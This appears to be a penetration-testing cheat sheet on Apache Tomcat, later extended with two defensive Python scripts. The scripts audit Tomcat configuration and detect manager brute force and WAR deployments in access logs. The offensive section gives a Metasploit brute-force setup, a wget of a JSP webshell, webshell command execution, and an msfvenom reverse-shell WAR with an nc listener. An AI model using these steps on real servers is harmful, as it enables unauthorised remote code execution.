Apache Tomcat
Apache Tomcat is an open-source Java-based web server and servlet container used to deploy and run Java applications. It is widely used for hosting Java Servlets, JSP (JavaServer Pages), and WebSocket applications. Tomcat is lightweight, efficient, and supports Java EE specifications like JSP and Servlet API.
Tech Stack of Apache Tomcat
- Backend: Java (Servlet API, JSP, WebSocket API)
- Frontend: HTML, CSS, JavaScript (optional for web apps)
- Database: Works with MySQL, PostgreSQL, Oracle, etc. (via JDBC)
- Server: Apache Tomcat (self-contained), often used with Apache HTTP Server or Nginx
File Structure
/tomcat-root
├── bin/                 # Executable scripts for starting/stopping Tomcat
│   ├── catalina.sh      # Script to start/stop Tomcat (Linux/macOS)
│   ├── startup.sh       # Script to start Tomcat
│   ├── shutdown.sh      # Script to stop Tomcat
│   ├── catalina.bat     # Windows equivalent of catalina.sh
│   ├── startup.bat      # Windows script to start Tomcat
│   └── shutdown.bat     # Windows script to stop Tomcat
├── conf/                # Configuration files for Tomcat
│   ├── server.xml       # Main configuration file (ports, connectors, etc.)
│   ├── web.xml          # Default web application settings
│   ├── tomcat-users.xml # User authentication and roles
│   ├── context.xml      # Default application context settings
│   └── catalina.policy  # Security policy configuration
├── logs/                # Log files for Tomcat runtime (catalina.out, localhost.log, etc.)
├── temp/                # Temporary files (cache, session data, etc.)
├── webapps/             # Deployed web applications (WAR files and extracted folders)
│   ├── ROOT/            # Default web application (can be replaced)
│   ├── examples/        # Tomcat example applications (remove in production)
│   ├── manager/         # Tomcat Manager web interface (admin panel)
│   └── host-manager/    # Virtual host management interface
├── work/                # Compiled JSP files and temporary data
├── lib/                 # Java libraries and dependencies (JAR files)
├── LICENSE              # Tomcat license file
├── NOTICE               # Legal notices for bundled software
├── RELEASE-NOTES        # Release information and changes
└── README.md            # Basic information about Tomcat
Enumeration
## Invalid Path like https://site.rezydev.xyz/invalid-path with 404 page reveals
## info and version of tomcat
## Version Enumeration
curl -s http://site.rezydev.xyz/docs/ | grep Tomcat
If we have an LFI, we can read the web.xml file for sensitive information leakage.
/manager and /host-manager are high-value endpoints when approaching Tomcat.
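The defender's counterpart to the enumeration above is to check who can actually reach and log in to the manager applications. The script below is an added example, not code from the original page: it parses constructed samples of the three files listed under conf/ (tomcat-users.xml, the manager app's context.xml, and a server.xml fragment) and reports accounts holding manager or admin roles, whether their passwords are stored in plaintext, whether the manager context restricts source addresses with Tomcat's RemoteAddrValve or RemoteCIDRValve, and whether the realm is wrapped in Tomcat's LockOutRealm (which locks an account after repeated failures). The valve and realm class names are real Tomcat classes; the "no '$' means plaintext" rule for passwords is a heuristic assumption based on the salt$iterations$hash layout produced by Tomcat's CredentialHandler.

```python
"""Audit Tomcat conf/ files for the weaknesses the manager attack path relies on."""
import xml.etree.ElementTree as ET

PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
ADDRESS_VALVES = ("org.apache.catalina.valves.RemoteAddrValve",
                  "org.apache.catalina.valves.RemoteCIDRValve")
LOCKOUT_REALM = "org.apache.catalina.realm.LockOutRealm"

# Constructed sample files (not from any real host). The shipped
# tomcat-users.xml uses the same XML namespace, so tags are matched
# by local name after stripping the namespace.
TOMCAT_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="changeme" roles="manager-gui"/>
  <user username="ops" password="c2FsdA==$10000$9f86d081884c7d65" roles="manager-script"/>
  <user username="reader" password="readonly" roles="viewer"/>
</tomcat-users>
"""
# Manager context without any source-address restriction.
MANAGER_CONTEXT_XML = """<Context antiResourceLocking="false">
</Context>
"""
# Same context restricted to loopback, the form Tomcat ships by default.
HARDENED_CONTEXT_XML = r"""<Context antiResourceLocking="false">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>
"""
# server.xml fragment whose UserDatabaseRealm is not wrapped in a LockOutRealm.
SERVER_XML_SNIPPET = """<Server>
  <Service name="Catalina">
    <Engine name="Catalina" defaultHost="localhost">
      <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
             resourceName="UserDatabase"/>
    </Engine>
  </Service>
</Server>
"""


def _local(tag):
    """Strip an XML namespace prefix: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def privileged_accounts(users_xml):
    """Return (username, plaintext_password) for every manager/admin account."""
    found = []
    for el in ET.fromstring(users_xml).iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if roles & PRIVILEGED_ROLES:
            # Heuristic (assumption): hashed credentials look like
            # "salt$iterations$hash"; a value without '$' is plaintext.
            found.append((el.get("username"), "$" not in el.get("password", "")))
    return found


def has_address_valve(context_xml):
    """True if the context limits client source addresses with a Tomcat valve."""
    return any(_local(el.tag) == "Valve" and el.get("className") in ADDRESS_VALVES
               for el in ET.fromstring(context_xml).iter())


def has_lockout_realm(server_xml):
    """True if a LockOutRealm is configured anywhere in the server.xml tree."""
    return any(_local(el.tag) == "Realm" and el.get("className") == LOCKOUT_REALM
               for el in ET.fromstring(server_xml).iter())


def audit(users_xml, context_xml, server_xml):
    """Collect human-readable findings for the three configuration files."""
    findings = []
    for name, plaintext in privileged_accounts(users_xml):
        findings.append(f"privileged account '{name}'"
                        + (" with plaintext password" if plaintext else ""))
    if not has_address_valve(context_xml):
        findings.append("manager context.xml has no RemoteAddrValve/RemoteCIDRValve: "
                        "manager reachable from any source address")
    if not has_lockout_realm(server_xml):
        findings.append("server.xml realm is not wrapped in LockOutRealm: "
                        "no lockout after repeated login failures")
    return findings


if __name__ == "__main__":
    for finding in audit(TOMCAT_USERS_XML, MANAGER_CONTEXT_XML, SERVER_XML_SNIPPET):
        print("-", finding)
```

On a real installation, read the files from conf/tomcat-users.xml, conf/server.xml and webapps/manager/META-INF/context.xml and pass their contents to audit(); an empty findings list means the manager is loopback-only, lockout is active and no privileged account has a plaintext password.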
Exploitation
Bruteforcing
- We can brute-force the /manager endpoint with Hydra, Medusa, Burp Intruder, the Metasploit module (auxiliary/scanner/http/tomcat_mgr_login), or any available script to gain access if weak credentials are in place.
## Bruteforce /manager using Metasploit
use auxiliary/scanner/http/tomcat_mgr_login
set VHOST site.rezydev.xyz
set RPORT 8000
set STOP_ON_SUCCESS true
set RHOSTS 10.10.10.10
run
WAR File Upload
Apache Tomcat provides a web-based manager interface for deploying applications. Users with manager-gui privileges can upload a WAR (Web Application Archive) file to deploy a web shell and gain Remote Code Execution (RCE).
Exploitation Steps
- Gain Access to Tomcat Manager
  - After obtaining valid credentials (via brute force or other methods), log in to /manager/html.
- Create a Malicious WAR File
  - Download a JSP-based web shell: `wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp`
  - Package the web shell into a WAR file using the zip utility: `zip -r ourfile.war cmd.jsp`
- Upload the WAR File to Tomcat
  - Go to Tomcat Manager > Deploy > Browse and select ourfile.war.
  - Click Deploy to upload the file.
  - The deployed application will be accessible at: http://site.rezydev.xyz:8000/ourfile/
- Access the Web Shell
  - Open the web shell in a browser: http://site.rezydev.xyz:8000/ourfile/cmd.jsp?cmd=id
- Gain Reverse Shell Access
  - Use msfvenom to generate a JSP-based reverse shell: `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 -f war > ourfile.war`
  - Upload and deploy ourfile.war via Tomcat Manager.
  - Start a Netcat listener: `nc -lnvp 1337`
  - Click on /ourfile/ to execute the payload and receive a reverse shell.
Automating with Metasploit
- The multi/http/tomcat_mgr_upload Metasploit module can automate the WAR deployment and execution process.
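Both the brute-force section and the WAR upload steps leave a clear trace in Tomcat's access log (logs/ directory), so a defender can detect them with a few lines of log analysis. The script below is an added example, not code from the original page: it parses constructed log lines in the format of Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b), flags source addresses with repeated 401/403 responses against /manager or /host-manager inside a sliding window (the brute-force signature), and lists successful requests to the manager deployment endpoints (the HTML manager's /manager/html/upload form and the text interface's deploy path used by scripts and the Metasploit upload module) together with the authenticated account. The sample addresses, timestamps and threshold are assumptions chosen for the demonstration.

```python
"""Detect Tomcat Manager brute force and WAR deployments in an access log."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (not real traffic) in Tomcat's default
# AccessLogValve pattern: %h %l %u %t "%r" %s %b
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2024:09:14:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [12/Mar/2024:09:14:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [12/Mar/2024:09:14:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [12/Mar/2024:09:14:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [12/Mar/2024:09:14:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [12/Mar/2024:09:14:06 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - tomcat [12/Mar/2024:09:14:09 +0000] "GET /manager/html HTTP/1.1" 200 15231
203.0.113.5 - tomcat [12/Mar/2024:09:14:20 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=XYZ HTTP/1.1" 200 15890
203.0.113.5 - - [12/Mar/2024:09:14:25 +0000] "GET /ourfile/cmd.jsp?cmd=id HTTP/1.1" 200 512
198.51.100.7 - - [12/Mar/2024:09:20:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.7 - - [12/Mar/2024:09:20:30 +0000] "GET /index.html HTTP/1.1" 200 1024
garbled line that does not match the pattern
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The manager applications the page flags as high-value endpoints.
MANAGER_PREFIXES = ("/manager", "/host-manager")
# Deployment endpoints: the HTML manager upload form and the text interface.
DEPLOY_ENDPOINTS = (
    ("POST", "/manager/html/upload"),
    ("PUT", "/manager/text/deploy"),
    ("PUT", "/manager/deploy"),
)


def parse_access_log(text):
    """Return one dict per parseable line; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["time"] = datetime.strptime(ev["time"], TIME_FMT)
        ev["status"] = int(ev["status"])
        ev["path"] = ev["path"].split("?", 1)[0]  # drop the query string
        events.append(ev)
    return events


def find_manager_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Map source host -> peak number of manager auth failures (401/403)
    seen inside any sliding window of the given length, for hosts that
    reached the threshold."""
    recent = defaultdict(deque)
    flagged = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["status"] not in (401, 403) or not ev["path"].startswith(MANAGER_PREFIXES):
            continue
        q = recent[ev["host"]]
        q.append(ev["time"])
        while q and ev["time"] - q[0] > window:
            q.popleft()  # expire failures older than the window
        if len(q) >= threshold:
            flagged[ev["host"]] = max(flagged.get(ev["host"], 0), len(q))
    return flagged


def find_war_deployments(events):
    """Successful requests to a deployment endpoint as
    (time, host, user, method, path), so each can be tied to an account."""
    hits = []
    for ev in events:
        if ev["status"] != 200:
            continue
        for method, path in DEPLOY_ENDPOINTS:
            if ev["method"] == method and ev["path"].startswith(path):
                hits.append((ev["time"], ev["host"], ev["user"], ev["method"], ev["path"]))
    return hits


if __name__ == "__main__":
    evs = parse_access_log(SAMPLE_LOG)
    print("brute-force sources:", find_manager_bruteforce(evs))
    for hit in find_war_deployments(evs):
        print("deployment:", hit)
```

On a live server, feed the contents of logs/localhost_access_log.*.txt to parse_access_log(); a deployment event from an account that is not expected to deploy, or one that follows a burst of failures from the same address as in the sample, is the sequence the exploitation steps above produce.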
Known Vulnerabilities
- CVE-2020-1938 - Ghostcat